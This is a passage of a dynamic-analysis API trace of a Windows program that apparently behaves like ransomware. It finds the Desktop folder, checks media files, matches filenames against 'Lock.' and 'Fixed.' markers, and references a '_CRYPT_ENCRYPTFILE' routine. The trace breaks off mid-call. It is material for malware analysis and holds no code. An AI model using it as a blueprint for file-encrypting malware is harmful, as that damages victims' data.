pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0131.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0131.695] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/2a44Hi4EE Lmnc.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a", lpFilePart=0x8cf650*="2a44Hi4EE Lmnc.m4a") returned 0x2a [0131.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0131.696] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2a44Hi4EE Lmnc.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2a44hi4ee lmnc.m4a")) returned 0xffffffff [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0131.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0131.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0131.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0131.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3cV5UrNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cV5UrNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V5UrNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5UrNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UrNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rNf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0131.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0131.697] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0131.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0131.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0131.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0131.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0131.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3cV5UrNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cV5UrNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V5UrNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5UrNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UrNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rNf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0131.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0131.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0131.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0131.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0131.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0131.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0131.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0131.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0131.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0131.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0131.700] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0131.701] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0131.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0131.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0131.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0131.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0131.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0131.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0131.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0131.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0131.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0131.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0131.703] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0131.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0131.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0131.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, 